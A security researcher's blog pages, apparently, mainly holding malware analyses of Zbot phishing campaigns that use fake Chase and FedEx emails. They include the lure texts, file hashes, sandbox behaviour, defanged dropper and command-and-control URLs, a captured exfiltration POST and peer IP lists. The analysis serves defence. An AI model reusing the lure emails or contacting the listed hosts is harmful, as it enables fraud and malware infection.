Saturday, May 20, 2017

Time to start blogging again.   So I started back up my malware research into rootkits and kicked the dust off all my servers and VM's.    I look forward to start sharing my reverse engineer projects again.


"As always, Capital One customers have zero liability for fraudulent activity"

A message for our customers about the Target compromise:

We want to assure you that we are aware of the reported incident at Target impacting some credit and debit cardholders who used their cards at Target stores between November 27 and December 15, 2013.
Protecting customer and account information is a top priority and we take it very seriously. We have rigorous fraud systems in place that actively monitor our customers' accounts for suspicious activity. If we suspect fraud, we will contact you to confirm the fraud, then close your account and reopen it with a new account number.
As always, Capital One customers have zero liability for fraudulent activity. We encourage you to monitor your accounts and if you notice any activity that you do not recognize, you should call the number on the back of your card as soon as possible.
You can also enroll in account alerts to help you keep track of activity on your accounts. Sign in to online banking to set up text or email alerts based on your preferences.
If you have any questions or concerns, please contact us via Twitter (@askcapitalone) or call the number on your card or statement.

Frequently Asked Questions

Was my data compromised?
Target is reporting that some credit and debit cards used at Target stores between November 27 and December 15 were compromised. If you did not use your card at a Target store during this timeframe, we do not have reason to believe your card was compromised.  We continuously monitor for fraud and if we notice any irregular activity we will individually notify the customer.
What should I do?
Whether you're notified or not, it's always a good idea to check your credit report and be aware of any suspicious activity on all of your accounts.
Will Capital One be notifying affected customers?
We will continue to monitor these accounts and notify customers of any suspicious activity.
Has the security breach been fixed?
Yes. Target is working with Visa and MasterCard and law enforcement to ensure no further information is exposed.
What are the chances that I become a victim of identity theft as a result of this incident?
We were informed that there wasn't significant personally identifying information stolen, such as Social Security numbers or addresses, so we believe that the risk of identity theft is greatly reduced. However, it's always a good idea to check your credit report regularly for incorrect information. In fact, you're entitled to one free copy of your credit report every year at www.annualcreditreport.com or by calling (877) 322–8228.

Tuesday, January 7, 2014

Chase Morgan Phishing Campaign = Zbot


Email:

From: Chase Morgan [mailto:gens@chase.com]
Sent: Tuesday, January 07, 2014 3:36 AM
Subject: Transaction Alert

Dear Customer,

Below attached is copy of the Telegraphic transfer slip as initiated from our bank to your account as instructed by,your adviced to print out copy of transfer slip for confirmation.

Regards,
Dennison Mark

#note they still cant spell :P 


# File
Zip File attachment: Payment_Slip.zip

File is actually a Payment Slip.scr

#DFIR 
https://malwr.com/analysis/ZDAxMzRhNWI3YWU5NDQ4NmE4ZGY3ZjNkZjZjOTAzOTI/

FILE NAMEPayment Slip.scr
FILE SIZE229689 bytes
FILE TYPEPE32 executable (GUI) Intel 80386, for MS Windows
MD5ddf15baab37ffb9d63c8095f6fad20f0
SHA1c56ca8e346a9ff2f3de9d44d2aa9f6662ddfc8fe
SHA25684c595902978bf5a9a9343b62c8a650e34b3000355ce8b554887dd4e37989c3e
SHA512db307fd4c251a8507f5a497353bac95473b02aed3b5b964f303f99e71a0bf65b5e5eb35dc5fed7cd89bc39c85fdb87bdf5e563be49e4525b0a91193a8a578885
CRC3220434565
SSDEEP6144:n0PyNAsjNceWItMN8HedzJenWoQAJD0N4YEv2Fkbl:nUG68HmJenWoQsO4ZOFS
YARA
  • shellcode - Matched shellcode byte patterns




Hosts

IP
208.64.67.36
74.125.136.105
74.125.136.94






Domains

DOMAINIP
balharbourcondo[.]com208.64.67.36
www.google.com74.125.136.103
www.google.nl74.125.136.94

http://balharbourcondo[.]com/item/gate[.]php {exfiltration snippet}
POST /item/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)
Host: balharbourcondo.com
Content-Length: 346
Connection: Keep-Alive
Cache-Control: no-cache

\xddcC\x1bK-\x17\xf4Q\xc8\x0f\x03\xd9\x89\xc8Y\x9a\x1f<\xaa\x82\xc3\x9e\xdf\x8aTO\x07B\xdb\xeeT\xb9\xc9\xdf\xa8\xe1\x0c\xe8\xae=\x00\xb7=i\x17\xf9\xcd\x08V0\x84\x8a\xa1&"\x0f\xfa!\x1d\xdbd\xcbv\x00\x8b^\xf4\xc7!e\xa6\xef(\xba\xac\xcbf\xfd\xb4\xa4!T6V\xb1\xafg\xdb\xdcG\x96i\xfa\xa5\x95\x18%\x8c\x84TqrrF\xc7\x8a\xc3L\x90o\xef \xe9\xf9v"\xdc.6-.\x00\xe1&\xd2\x03\xbaI\x98P
\xf2\x15u\xb8*\x81\xfaY\x960Y\xd5\x0e\x90\x07o'r`\x15\xe1vr\x14\xda\x1a\xe2\xad\xe5Ir\xa4\xd5\xd0\x95\xca^|t\x80\xd7\xe3z\xdb%v\x96\xa4\xc3-!\xeb\x19\xd5\xe1\xb4\x92\xc6v\x84yrI\xd6\xf5N\xfcw\xca\x86;\xf8\xea\xc8C\x94\x8a\xdb|\xf4\x97J\xa4m\xf6dV\xa2\xed\x84G-\x91\xa6\x92?\xe9\x1e\xad\xfd\x87"e\xaf\xa6\x1e\x7fs\xdb\x80BTb\x03\x99\x19\x87\xc6\xf5@EEtE\x04\xba\xd9\xc5 Gy &/\xc2Ha\xcd\xf8\xe4\xb5\x1c\xc6R\x83\x1c\xa4G'\xeb\xa6P\xab\x0f:o\xf3\x1bP\xa6\xe4T\x9f\xa6\xf9\x16\xb4ut\xaf^X\xcf@\xa0\x1aZb\x0e
 \xbaJ\x93\x87\xd8[\x02E\xe3\xf2\xe2'\xa5\xeeu\\xe2\xf9^
\xb1\xe6\x8c!S\x9a\x18\xac,\x12\xfe\xacf
..

IP ADDRESSES

First seenLast seenIPs
10/10/131/7/14
KNOWN DOMAINS HOSTED BY 208.64.67.36
balharbourcondofl[.]com
bronxdentistny[.]com 
buy400sunnyislescondo[.]com 
ns1[.]thinkwmb[.]ru 
thinkwmb[.]ru 
balharbourcondo[.]com 
posrednikusaebay[.]ru 
serial[.]allz.su 
serialls[.]biz 
balharbourbellini[.]com 
buychateaubeach[.]com 
sunnyislesrealestatecondos[.]com 
buymansionsatacqualina[.]com 
buyporshedesigntower[.]com 
mir-automatiki[.]ru 
sellturnberryoceancolony[.]com 
balharbourmajestictowers[.]com 
stregisandbalharbour[.]com 
ftp[.]deeplogic[.]us

Tuesday, December 31, 2013

Happy New Year

I hope everyone has a safe New Year, and welcomes in the new year.   We have our health, our families and the lessons we learned from 2013.
Be thankful.  

God Bless.


Tuesday, November 5, 2013

FedEx Phishing Campaign (Zbot)

FedEx Phishing Campaign 

At the time I pulled this sample it was 8 hours old on VirusTotal.  It did not appear to be specific to any industry and minimal changes had been changed to the PE to evade detection.  



Details are as follows: 







118.21.162.237 (i118-21-162-237.s30.a048.ap.plala.or.jp)
Tokyo 40 Japan
Delivery: SMTP
exe
37.0 KB
61740 -> 25 (SMTP)
TCP Client to TCP Server
Trojan.Win32.Agent.acqpl TROJWARE (zbot)
Agent acqpl




Other Country Sources: 
http://pastebin.com/RJi9XqX5



Email:
mime(Order history page.zip.b64) base64(Order history page.zip) zip(Order history page.pdf.exe)
i118-21-162-237.s30.a048.ap.plala.or.jp mail.company.com BODY=7BIT BODY=7BIT
Subject: Your Rewards Order Has Shipped

Body
ontent-Type: text/plain; charset=windows-1250.
Content-Transfer-Encoding: 7bit.

This is to confirm that one or more items in your order has been shipped. ..Note that multiple items in an order may be shipped separately.....

You can review complete details of your order on the ..Order History page ..........

hanks for choosing FedEx.....

Order Confirmation Number: ..3899836....

Order Date: ..11/03/2013....

Redemption Item...Quantity...Tracking Number....

Paper, Document16.

fedex.com...
Follow FedEx

You may receive separate e-mails with tracking ..information for reward ord ered...
My FedEx Rewards may be modified or terminated at any time ..without notice . Rewards points available for qualifying purchases and certain exclusions apply . For details and ..a complete listing of eligible products and services please read ..My FedEx Rewards Terms and Conditions.........
2012 FedEx. The content of this message is ..protected by copyright and tr

Malwr


Forensic Data (Text)
MZ ÿÿ @ @
$ PE L 1⁄2[cB à
Z 0 @ à.code a
`.data $E 0 F !Àá èÓ É&ÉF&l2BÉF&
o  ́Í! ̧LÍ!This program cannot be run in DOS mode. : ä;
.text <
Ð ùÄ @à.idata:
R @À.rsrc ä; < X
@@
\2BÉF&
ÉF&ÉF&ÉF&ÉF&ÂÉF&"ÉF&&£2BF&*ÉF&.Bî2ÂvqÉ&2BÉF&ÉF&
ÉF&BîútDwÓllja2B4B¥T2Bjq2B7T2Bê©j2BÒîÉ&2BBîíË£
2B&âBWçîÉGþGþêËÅRÉÀa2BqBKuB3R@AIHHHR¬aZäõ3\+Òîl72BòB\+ÄTlljR2Bj22BB\+ÄÅ3Â\Å
êiqêhqêSqêJqWçUXYîj#2B7X2BêÕ¥4BGúvX?v RZ?ví 2Bí2B?2BvíêDG
&GF&GF&
GF&BÆíÉ&¢BÆ3ÂÆa`]ËÄ?2BwK7qB7qBjÚB7qBl
RÞB¥2B£2Bê 2BÉëèÄÔRÅWçî
hAO\wgüY>h
GúB"G
Gþ3ËWú=L<_ div="">
wUê2úvCíàGúB&G
3ÝhJGúBG
G
í3Âî_Ä
UF&
^&vF&F&
íæoío]Ä
vvRBVBZB^BÅ~BlBlBl¦Ba@ ÿ¬@ j ÿ°@ ÿ ́@ ÿ ̧@ ÿ1⁄4@ j ÿÀ@ ÿÄ@ ÿ@ ÿ`@ j ÿd@ ÿh@ ÿl@ j ÿp@ ÿt@ j ÿx@ ÿ@ ÿ@ j ÿ@ ÿ@ j Ã1ÿWjhP0@ h00@ ÿ@ = tÃ3⁄4 @ ÷j[d 0 Qj 1@ (ØaFâøD$Á@Ã@Ë @£V0@ ÄÃ
ì4j j ÿÈ@ h 1ÀPÌ@ ÿÒ£0@ »0@ Ç0@ @ ì ̧ Pj ÿÈ@ ì£0@ SÿÐ@ ìè¦ïÿÿë¤ÀUå
LoadLibraryExA record recsound c:\\ere\ereaaaa c FTPR user32.dll CLSS TranslateMessage @ j0@ éà áà ýà ûà ûà áà 4à Ià @à «à à 1à Þà ;à «à äà :à à ûà ûà ûà ûà #à ûà ûà {à à ûà ûà Pà à àà à pà à à @à à ,à Íà ,à Öà ®à ÿà òà îà à 1⁄4à Là à Hà à à @à à à Pà à $à Ëà Ýà ÷à Tà à à ,à 1⁄2à à Xà à $à Õà $à 3⁄4à 1⁄4à Ãà à à @à à à Xà à à à ~à Áà ÿà Ýà àà Äà 1⁄2à à ûà Pà à àà à pà à à xà à à Hà à ,à Íà à à à à à
--- CUT----

DFIR: 
MAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED _DATA, IMAGE_SCN_MEM_READ
c13cf0af350fd6dfb8380d0968c23 0b1.exe
filename: slide1.exe

Callbacks:
103[.]6[.]196[.]152
80
TCP
GET hxxp://asfitness[.]com:80/wp-content/uploads/2013/04/ourgoals.exe
request (dropper)

x-pingback
hxxp://www[.]asfitness.com/xmlrpc[.]php
x-powered-by PHP/5.3.27
location hxxp://www[.]asfitness[.]com/wp-content/uploads/2013/04/ourgoals.exe
content-length 0
server Apache

69[.]64[.]39[.]215
80 TCP
GET hxxp://dominionthe[.]com:80/images/slide1.exe
dominionthe[.]com
user-agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
content-length 441856
server Apache















99[.]35[.]113[.]22 8610
70[.]52[.]185[.]81 1044
109[.]152[.]163[.]147 9819
86[.]46[.]238[.]128 8274
178[.]131[.]179[.]64 6295
71[.]35[.]90[.]194 7606
59[.]99[.]73[.]77 9084
79[.]23[.]23[.]228 7377
141[.]0[.]97[.]49 5609
82[.]107[.]157[.]227 2186
150[.]212[.]189[.]200 1685
99[.]123[.]8[.]127 4870
139[.]195[.]227.57
2./228/.19./149 6356
84./140/.161/.152 4019
176/.73/.200/.140 5014
213/.123./216./113 8730
70/.246/.10./226 2276
2./135./143/.98 2696
108./237/.184/.77
80./11/.166/.26 1172
82./89./225./96 8310
70./30./53./56 8204
176./73/.230/.38 1153
201/.174/.194/.198 5552
58./97./166./89 2466
2./229./105./13 8381
217/.27./102/.96 6308
80./141./251./252 8581
190/.201/.1./139 9466
217./92./114/.216 1981
95./104./86./31 8251
78./15./147./55
75./146./121./185 3413
77./107./154./122 4450
79./19./139./88 6301
46./44./133./57 5717

Process activity after target sample started. lsass.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\lsass.exe
Mon Nov 04 2013 10:22:41 UTC C:\WINDOWS\system32\
C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\lsass.exe
Processes Name: lsass.exe
\lsass
Page 21
Name: svchost.exe
PID: Child Count: File Actions: Registry Actions: Analysis Reason: Process Name: Image Filename: Command Line: Children: New: Started At: Current Directory: Image Base Address: Window Title: Shell Info: Desktop Info:
748
0
2
37
Process activity after target sample started. svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\System32\svchost.exe -k netsvcs
Mon Nov 04 2013 10:22:42 UTC C:\WINDOWS\system32\
C:\WINDOWS\System32\svchost.exe

Artifacts
ID Path
16 748-svchost.exe
File Activity  Action  Path  Modified
\ROUTER
Modified
\WINDOWS\Prefetch\CMD.EXE-087B4001.pf
Registry Activity: Created Registry Keys
Created Key
Access List
Option List
REGISTRY\USER\S-1-5-21-1202660629-583907252- 1801674531- 1003\SOFTWARE\MICROSOFT\MULTIMEDIA\AUDIO COMPRESSION MANAGER\MSACM
CREATE_SUB_KEY,ENUMERATE_SUB_KEYS,QUERY_ VALUE,READ_CONTROL,NOTIFY,SET_VALUE
REG_OPTION_N ON_VOLATILE
REGISTRY\USER\S-1-5-21-1202660629-583907252- 1801674531- 1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Inte rnet Settings
CREATE_SUB_KEY,ENUMERATE_SUB_KEYS,QUERY_ VALUE,READ_CONTROL,NOTIFY,SET_VALUE
REG_OPTION_N ON_VOLATILE
Registry Activity: Modified Registry Keys
Modified Key
Value Name
Data Type
Data
REGISTRY\MACHINE\SOFTWARE\MICROSOFT\WINDO WS NT\CURRENTVERSION\PREFETCHER
TracesProces sed
DWORD_LIT TLE_ENDIAN
17
REGISTRY\MACHINE\SOFTWARE\MICROSOFT\WINDO WS NT\CURRENTVERSION\PREFETCHER
TracesSucce ssful
DWORD_LIT TLE_ENDIAN
5
REGISTRY\MACHINE\SOFTWARE\MICROSOFT\WINDO WS NT\CURRENTVERSION\PREFETCHER
LastTraceFail ure
DWORD_LIT TLE_ENDIAN
4
REGISTRY\MACHINE\SOFTWARE\MICROSOFT\WINDO WS NT\CURRENTVERSION\PREFETCHER
TracesProces sed
DWORD_LIT TLE_ENDIAN
18
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\TCPIP\PARAMETERS\INTERFACES\{C20FDDB0- BD90-4E06-8D7A-87767A382393}
DhcpRetrySta tus
DWORD_LIT TLE_ENDIAN
2
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\TCPIP\PARAMETERS\INTERFACES\{C20FDDB0- BD90-4E06-8D7A-87767A382393}
DhcpDefaultG ateway
MULTI_SZ
172.16.1.1
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\{C20FDDB0-BD90-4E06-8D7A- 87767A382393}\PARAMETERS\TCPIP
DhcpDefaultG ateway
MULTI_SZ
172.16.1.1
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\TCPIP\PARAMETERS
DhcpNameSe rver
SZ
172.16.1.1
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\TCPIP\PARAMETERS\INTERFACES\{C20FDDB0- BD90-4E06-8D7A-87767A382393}
DhcpNameSe rver
SZ
172.16.1.1
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\TCPIP\PARAMETERS\INTERFACES\{C20FDDB0- BD90-4E06-8D7A-87767A382393}
DhcpSubnet MaskOpt
MULTI_SZ
255.255.0.0
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\{C20FDDB0-BD90-4E06-8D7A- 87767A382393}\PARAMETERS\TCPIP
DhcpSubnet MaskOpt
MULTI_SZ
255.255.0.0 Page 22
Details for Alert ID 67540517
{C20FDDB0- BD90-4E06- 8D7A- 87767A38239 3}
BINARY
DhcpIPAddre ss
SZ
DhcpIPAddre ss
SZ
DhcpSubnet Mask
SZ
DhcpSubnet Mask
SZ
DhcpServer
SZ
DhcpServer
SZ
Lease
DWORD_LIT TLE_ENDIAN
Lease
DWORD_LIT TLE_ENDIAN
LeaseObtaine dTime
DWORD_LIT TLE_ENDIAN
LeaseObtaine dTime
DWORD_LIT TLE_ENDIAN
T1
DWORD_LIT TLE_ENDIAN
T1
DWORD_LIT TLE_ENDIAN
T2
DWORD_LIT TLE_ENDIAN
T2
DWORD_LIT TLE_ENDIAN
LeaseTermin atesTime
DWORD_LIT TLE_ENDIAN
LeaseTermin atesTime
DWORD_LIT TLE_ENDIAN
IPAutoconfigu rationAddress
SZ
IPAutoconfigu rationMask
SZ
IPAutoconfigu rationSeed
DWORD_LIT TLE_ENDIAN
AddressType
DWORD_LIT TLE_ENDIAN
IsServerNapA ware
DWORD_LIT TLE_ENDIAN
DhcpRetrySta tus
DWORD_LIT TLE_ENDIAN
DhcpRetryTi me
DWORD_LIT TLE_ENDIAN
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\DHCP\PARAMETERS
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\TCPIP\PARAMETERS\INTERFACES\{C20FDDB0- BD90-4E06-8D7A-87767A382393}
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\{C20FDDB0-BD90-4E06-8D7A- 87767A382393}\PARAMETERS\TCPIP
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\TCPIP\PARAMETERS\INTERFACES\{C20FDDB0- BD90-4E06-8D7A-87767A382393}
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\{C20FDDB0-BD90-4E06-8D7A- 87767A382393}\PARAMETERS\TCPIP
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\TCPIP\PARAMETERS\INTERFACES\{C20FDDB0- BD90-4E06-8D7A-87767A382393}
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\{C20FDDB0-BD90-4E06-8D7A- 87767A382393}\PARAMETERS\TCPIP
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\TCPIP\PARAMETERS\INTERFACES\{C20FDDB0- BD90-4E06-8D7A-87767A382393}
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\{C20FDDB0-BD90-4E06-8D7A- 87767A382393}\PARAMETERS\TCPIP
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\TCPIP\PARAMETERS\INTERFACES\{C20FDDB0- BD90-4E06-8D7A-87767A382393}
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\{C20FDDB0-BD90-4E06-8D7A- 87767A382393}\PARAMETERS\TCPIP
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\TCPIP\PARAMETERS\INTERFACES\{C20FDDB0- BD90-4E06-8D7A-87767A382393}
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\{C20FDDB0-BD90-4E06-8D7A- 87767A382393}\PARAMETERS\TCPIP
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\TCPIP\PARAMETERS\INTERFACES\{C20FDDB0- BD90-4E06-8D7A-87767A382393}
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\{C20FDDB0-BD90-4E06-8D7A- 87767A382393}\PARAMETERS\TCPIP
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\TCPIP\PARAMETERS\INTERFACES\{C20FDDB0- BD90-4E06-8D7A-87767A382393}
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\{C20FDDB0-BD90-4E06-8D7A- 87767A382393}\PARAMETERS\TCPIP
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\TCPIP\PARAMETERS\INTERFACES\{C20FDDB0- BD90-4E06-8D7A-87767A382393}
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\TCPIP\PARAMETERS\INTERFACES\{C20FDDB0- BD90-4E06-8D7A-87767A382393}
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\TCPIP\PARAMETERS\INTERFACES\{C20FDDB0- BD90-4E06-8D7A-87767A382393}
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\TCPIP\PARAMETERS\INTERFACES\{C20FDDB0- BD90-4E06-8D7A-87767A382393}
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\TCPIP\PARAMETERS\INTERFACES\{C20FDDB0- BD90-4E06-8D7A-87767A382393}
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\TCPIP\PARAMETERS\INTERFACES\{C20FDDB0- BD90-4E06-8D7A-87767A382393}
REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVI CES\TCPIP\PARAMETERS\INTERFACES\{C20FDDB0- BD90-4E06-8D7A-87767A382393}
AwAAAAAAAAAEAAAAAAAAAAqxd1KsEA EBUQAAAAAAAAASAAAAAAAAAAqxd1ID// 9qb2UtOGE4MWM3NmM5ZGYAAAYAAAA AAAAABAAAAAAAAAAKsXdSrBABARwAA AAAAAAABAAAAAAAAAAKsXdSrBD//wEA AAAAAAAABAAAAAAAAAAKsXdS//8AADs AAAAAAAAABAAAAAAAAAAKsXdSAAAB9 zoAAAAAAAAABAAAAAAAAAAKsXdSAAA BFjMAAAAAAAAABAAAAAAAAAAKsXdSA AACWDYAAAAAAAAABAAAAAAAAAAKsX dSrBABATUAAAAAAAAAAQAAAAAAAAAK sXdSBQAAAA==
600
600 1383575218 1383575218 1383575496 1383575496 1383575721 1383575721 1383575818 1383575818 0.0.0.0 255.255.0.0 0

MANAGER\ACCOUNTS\VERISIGN
LDAP Search 
%ProgramFiles%\Common Files\Services\bigfoot.bmp
VeriSign Internet Directory Service directory.verisign.com http://www.verisign.com

%ProgramFiles%\Common Files\Services\verisign.bmp
WhoWhere Internet Directory Service ldap.whowhere.com http://www.whowhere.com

Registry Activity: Deleted Registry Key Values

ame: c13cf0af350fd6dfb8380d0968c230b1.exe
PID: Child Count: File Actions: Registry Actions: Analysis Reason: Process Name: Image Filename: Command Line: Children: New: Started At: Current Directory: Image Base Address: Window Title: Shell

File Activity: 
Path Created
\??\C:\DOCUME~1\Malware~1\LOCALS~1\Temp\xsiretgashup.exe
Modified
\DOCUME~1\Malware\LOCALS~1\Temp\xsiretgashup.exe
Modified
\ROUTER
Modified
\Documents and Settings\Malware\Local Settings\Temporary Internet Files\Content.IE5\MRMBYDAX\slide1[1].exe
Modified

Registry Activity: Created Registry Keys
REGISTRY\USER\Malware\Software\Microsoft\Multimedia\Audio Compression Manager\
READ_CONTROL,CREATE_SUB_KEY,SET_VALUE
REG_OPTION_N ON_VOLATILE

REGISTRY\MACHINE\SOFTWARE\MICROSOFT\CRYPTO GRAPHY\RNG

Cookie Harvest

BINARY
futxhHWuQhIfkFA2NIDyL77fRlXHJxTDhr40k GMDYeX3u+W7g1I1wsr0lh7Ou9iDaqs+zpu 91H2N3Hg1G/WP5SwYjzegsPYZa3lrn5j1O GZ+O81+OI/p9OzcDyvGZJW2V5HbiG5gx1 FimFpAjcJr1czwe2I+G6qSBA+2BMMKTyT8j U/45wogwxFa8w3Y3po1AAgDmMpNm36Q+ vegCF6PXRJeQlJdD+oQDvVfakhIGUzSmh+ tfoGcvF09ecHeAdiCgvUL1rQa4csKmknl9XU gcZzWMwqhOTcZu6VMbrMblZYf+qfOwRBd Xa+6jIgKrI44BKC77i+guuY3X1rgiQG6MsoL dnklRdyK+q882JNEHWf2IMvGotnkBnRsWu ML2aGusDB0ol/lRQTjkinpz3tvKwisf7sCVKH 3umZ1v2u9wtDYQHx5wnpAOTwHbwYBl3cn QJBCVVN3XpoYpSFH5DHRJXwqrOT6e/cD zneaJaYairW6OAEbV1ELiC6uAWzczShIuY +iWx/jTHr08ZQtaJI1L4OYew5GUpfSu65Fe OZH8tfcliW/pDLwjYm+aQ1ZpMkaLgHLGMb K840tB5I+w0RONhq28eJySS3HfApNToiJlSr QuS4cQxovd1bHvQ==
REGISTRY\USER\S-1-5-21-1202660629-583907252- 1801674531- 1003\SOFTWARE\MICROSOFT\OVNEOCAQY
2f09bg73
SZ
futxhHWuQhIfkFA2NIDyL77fRlXHJxTDhr40k GMDYeX3u+W7g1I1wsr0lh7Ou9iDaqs+zpu 91H2N3Hg1G/WP5SwYjzegsPYZa3lrn5j1O GZ+O81+OI/p9OzcDyvGZJW2V5HbiG5gx1 FimFpAjcJr1czwe2I+G6qSBA+2BMMKTyT8j U/45wogwxFa8w3Y3po1AAgDmMpNm36Q+ vegCF6PXRJeQlJdD+oQDvVfakhIGUzSmh+ tfoGcvF09ecHeAdiCgvUL1rQa4csKmknl9XU gcZzWMwqhOTcZu6VMbrMblZYf+qfOwRBd Xa+6jIgKrI44BKC77i+guuY3X1rgiQG6MsoL dnklRdyK+q882JNEHWf2IMvGotnkBnRsWu ML2aGusDB0ol/lRQTjkinpz3tvKwisf7sCVKH 3umZ1v2u9wtDYQHx5wnpAOTwHbwYBl3cn QJBCVVN3XpoYpSFH5DHRJXwqrOT6e/cD zneaJaYairW6OAEbV1ELiC6uAWzczShIuY +iWx/jTHr08ZQtaJI1L4OYew5GUpfSu65Fe OZH8tfcliW/pDLwjYm+aQ1ZpMkaLgHLGMb K840tB5I+w0RONhq28eJySS3HfApNToiJlSr QuS4cQxovd1bHvQ==
REGISTRY\USER\S-1-5-21-1202660629-583907252- 1801674531- 1003\SOFTWARE\MICROSOFT\OVNEOCAQY
2f09bg73
SZ
futxhHWuQhIfkFA2NIDyL77fRlXHJxTDhr40k GMDYeX3u+W7g1I1wsr0lh7Ou9iDaqs+zpu 91H2N3Hg1G/WP5SwYjzegsPYZa3lrn5j1O GZ+O81+OI/p9OzcDyvGZJW2V5HbiG5gx1 FimFpAjcJr1czwe2I+G6qSBA+2BMMKTyT8j U/45wogwxFa8w3Y3po1AAgDmMpNm36Q+ vegCF6PXRJeQlJdD+oQDvVfakhIGUzSmh+ tfoGcvF09ecHeAdiCgvUL1rQa4csKmknl9XU gcZzWMwqhOTcZu6VMbrMblZYf+qfOwRBd Xa+6jIgKrI44BKC77i+guuY3X1rgiQG6MsoL dnklRdyK+q882JNEHWf2IMvGotnkBnRsWu ML2aGusDB0ol/lRQTjkinpz3tvKwisf7sCVKH 3umZ1v2u9wtDYQHx5wnpAOTwHbwYBl3cn QJBCVVN3XpoYpSFH5DHRJXwqrOT6e/cD zneaJaYairW6OAEbV1ELiC6uAWzczShIuY +iWx/jTHr08ZQtaJI1L4OYew5GUpfSu65Fe OZH8tfcliW/pDLwjYm+aQ1ZpMkaLgHLGMb K840tB5I+w0RONhq28eJySS3HfApNToiJlSr QuS4cQxovd1bHvQ==

BINARY
futxhK4DNUDRIlZxQfKkhf/ZXWdkOj9O5gZo 4Mf/VED1jOxz2GOCOd70lh7Ou9iDaqs+zpu 91H2N3Hg1wESyAoro2ZFKYkWsQdCRv3G soyA7xBGeXVAZ/vhYUo3O/oikqYdnmTcPN RE4WKn3hSeVhYoF7l1iFhKf0lpB2wHxIO4I W5Q5QbGy74ucwuG/WQwF8y+99aPOo8z RcOrB7cjAlRn9iTTdWuEQ
REGISTRY\USER\S-1-5-21-1202660629-583907252- 1801674531- 1003\SOFTWARE\MICROSOFT\OVNEOCAQY
7dg9e28
BINARY
futxhHWuQhIfoFE2NIDy6StwEtJr5sGtoUDT ZbG91otOoMl6
REGISTRY\USER\Malware\SOFTWARE\MICROSOFT\OVNEOCAQY
20dcj2dj
SZ
futxhK4DNUDRIlZxQfKkhf/ZXWdkOj9O5gZo 4Mf/VED1jOxz2GOCOd70lh7Ou9iDaqs+zpu 91H2N3Hg1wESyAoro2ZFKYkWsQdCRv3G soyA7xBGeXVAZ/vhYUo3O/oikqYdnmTcPN RE4WKn3hSeVhYoF7l1iFhKf0lpB2wHxIO4I W5Q5QbGy74ucwuG/WQwF8y+99aPOo8z RcOrB7cjAlRn9iTTdWuEQayfz469Q3O03t6 TySw9I7Qt2I/hj7+c1+wqycD7aP+dnadqZvEr A9gDfNcbKNxlfvswInMU/J/g=
REGISTRY\USER\Malware\SOFTWARE\MICROSOFT\OVNEOCAQY
2f09bg73
BINARY
futxhHWuQhIfkFA2NIDyS+6AFi0qCbIwpiC9 5tihkDVh2NZd6WEig9P0lh7Ou9iDaqs+zpu9 1H2N3HhlBoxu9/DNhPETINQQcKbBkG0GI QA/XyDufls3zyyh0LHS0sW98zglj7cTB90Tjh WNT+2poQsIBdCd8rGu2/qtli6NC1p04A/pIyx b0du6egt1DH9cC0ex7o4FSM8cAz82P+FWf 5ZHT1XI9z42ItIcYo0b+oYoru7DBcX7M7Ge ABMbhE8gEI0s/E343Vlxf+PltHnnHpUWE6u 9iwRtizvW0xnefide8bVHReqx8pnswnL9/Fyp 3yAhu18aNPFMyUznygwR9yZcOs1QppU1J 2ucuMhhA1eLCUTbznbyaHYKEOW8d5JjNj Dgkz2bA7CuTCbGnHleDb17P4cO5XtKFhX mv2u9wtDYQHx5wnpAOTwHbwYBl3cnQJB CVVN3XpoYpSFH5DHRJXwqrOT6e/cDznea JaYairW6OAEbV1ELiC6uAWzczShIuY+iWx/ jTHr08ZQtaJI1L4OYew5GUpfSu65FeOZH8tf cliW/pDLwjYm+aQ1ZpMkaLgHLGMbK840tB 5I+w0RONhq28eJySS3HfApNToiJlSrQuS4c Qxovd1bHvSPcoPJlJp6KMSN+WT4SX2P24 TPbbunIQn3RyJEP528CCpNk2AN1MduFiSt VJR2WYnP4mlJee1kZwvonXg+m5INbzx9yb isidYkwsxXZCozNISXtcmz3hCig+V2PoAn+4 OwF6tVnrNcyKo6Nyzn79k4ff4ZsApUItNdbU 